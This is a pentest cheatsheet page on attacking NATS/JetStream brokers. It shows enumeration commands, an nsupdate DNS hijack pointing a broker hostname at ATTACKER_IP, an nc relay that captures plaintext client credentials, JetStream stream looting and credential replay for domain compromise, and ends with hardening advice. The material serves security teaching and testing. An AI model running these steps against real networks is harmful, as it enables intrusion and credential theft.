daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

4222-pentesting-nats.md (6282B)


      1 ---
      2 title: "4222 - Pentesting NATS / JetStream"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/4222-pentesting-nats.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/4222-pentesting-nats.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 4222 - Pentesting NATS / JetStream
     14 
     15 ## Basic Information
     16 
     17 **NATS** is a high-performance message bus that speaks a simple text-based protocol: the server transmits an `INFO { ... }` JSON banner immediately after TCP connect, and the client replies with a `CONNECT {"user":"USERNAME","pass":"PASSWORD",...}` frame followed by optional `PING`/`PUB`/`SUB` commands. JetStream adds persistence primitives (Streams & Consumers) on top of the same TCP port (`4222/tcp`). TLS and authentication are optional, so many internal deployments run **plaintext AUTH**.
     18 
     19 * Default client port: **4222/tcp**; the conventional cluster-route port is **6222/tcp**, and optional HTTP monitoring commonly uses **8222/tcp**.<sup>[[2]](#references)</sup>
     20 * Stock banner fields: `"version"`, `"auth_required"`, `"jetstream"`, `"max_payload"`, `"tls_required"`
     21 
     22 ## Enumeration
     23 
     24 ### Banner grabbing / service probes
     25 
     26 ```bash
     27 nmap -p4222 -sV --script banner TARGET
     28 # Sample output
     29 # 4222/tcp open  nats  NATS.io gnatsd 2.11.3
     30 # | banner: INFO {"server_id":"NDo...","version":"2.11.3","proto":1,"auth_required":true,"jetstream":true,"max_payload":1048576}
     31 ```
     32 
     33 The INFO frame can also be pulled manually:
     34 
     35 ```bash
     36 echo | nc HOST 4222
     37 INFO {"server_id":"NCLWJ...","version":"2.11.3","auth_required":true,"jetstream":true}
     38 -ERR 'Authorization Violation'
     39 ```
     40 
     41 Install the official CLI for deeper interaction; check the current project's Go toolchain requirement before building from source.<sup>[[4]](#references)</sup>
     42 
     43 ```bash
     44 go install github.com/nats-io/natscli/nats@latest
     45 nats -s nats://HOST:4222 rtt
     46 ```
     47 
     48 Authentication failures immediately raise `nats: Authorization Violation`, so valid creds are required for any meaningful RPC.
     49 
     50 ## Credential capture via DNS/service impersonation
     51 
     52 - Identify stale AD DNS entries for the broker hostname (e.g. `nats-svc.domain.local`). If the record returns `NXDOMAIN`, a low-privileged domain user can recreate it thanks to default dynamic-update ACLs. See [AD DNS Records abuse](/hacktricks/windows-hardening/active-directory-methodology/ad-dns-records) for background.<sup>[[1]](#references)</sup>
     53 - Register the hostname to an attacker-controlled IP:
     54 
     55 ```bash
     56 nsupdate
     57 > server DC_IP
     58 > update add nats-svc.domain.local 60 A ATTACKER_IP
     59 > send
     60 ```
     61 
     62 - In a lab, mirror the legitimate banner and observe whether a legacy username/password client sends a `CONNECT` frame before authenticating the server. This credential-capture condition requires plaintext NATS or TLS without server identity validation; correctly validated TLS prevents simple DNS impersonation.<sup>[[3]](#references)</sup>
     63 
     64 ```bash
     65 nc REAL_NATS 4222 | head -1 | nc -lnvp 4222
     66 ```
     67 
     68 - As soon as an internal client resolves the hijacked name, it will emit a plaintext `CONNECT` frame containing the `user` / `pass` pair and various telemetry (client name, Go version, protocol level). Because nothing past the INFO banner is required, even `nc` is enough to harvest secrets.
     69 - For longer engagements, build the official server locally and inspect the relevant version in a lab. TRACE logging can expose usernames; code instrumentation or packet capture may reveal additional authentication material when transport encryption is absent.<sup>[[4]](#references)</sup>
     70 
     71 ```bash
     72 git clone https://github.com/nats-io/nats-server
     73 cd nats-server
     74 go build
     75 ./nats-server -V
     76 ```
     77 
     78 ## JetStream looting & password hunting
     79 
     80 Once any credential is recovered (e.g. `Dev_Account_A`), store it as a CLI context to avoid retyping:<sup>[[1]](#references)</sup>
     81 
     82 ```bash
     83 nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
     84 ```
     85 
     86 JetStream discovery usually follows this pattern:
     87 
     88 ```bash
     89 nats account info --context mirage      # quotas, stream count, expiration
     90 nats stream list --context mirage       # names + message totals
     91 nats stream info auth_logs --context mirage
     92 nats stream view auth_logs --context mirage
     93 ```
     94 
     95 Streaming teams frequently log authentication events into subjects such as `logs.auth`. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords:
     96 
     97 ```json
     98 {"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
     99 ```
    100 
    101 Retained secrets can then be replayed against Kerberos-only services using `netexec smb DC01 -u USER -p PASS -k`, enabling full domain compromise.
    102 
    103 ## Hardening & detection
    104 
    105 * **Enforce and validate TLS** through the server's `tls` configuration and confirm the advertised `tls_required` behavior; optionally require client certificates for mTLS. NKey/JWT authentication material is commonly distributed in `.creds` files, but NKeys/credentials are distinct from TLS client certificates.<sup>[[3]](#references)</sup>
    106 * **Pinpoint who can update DNS** – delegate service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Combine with scavenging alerts so missing broker names cannot be silently re-claimed.
    107 * **Disable credential logging**. Scrub secrets before publishing to subjects, set JetStream retention/age limits, and restrict stream-management permissions to trusted operators.
    108 * **Monitor for banner anomalies** – repeated short-lived connections, authentication timeouts, or INFO banners that do not match the blessed template suggest spoofed servers.
    109 
    110 ## References
    111 
    112 - [1] [HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting](https://0xdf.gitlab.io/2025/11/22/htb-mirage.html)
    113 - [2] [NATS documentation — Server ports](https://docs.nats.io/running-a-nats-service/nats_docker)
    114 - [3] [NATS documentation — TLS configuration](https://docs.nats.io/running-a-nats-service/configuration/securing_nats/tls)
    115 - [4] [nats-io/nats-server](https://github.com/nats-io/nats-server)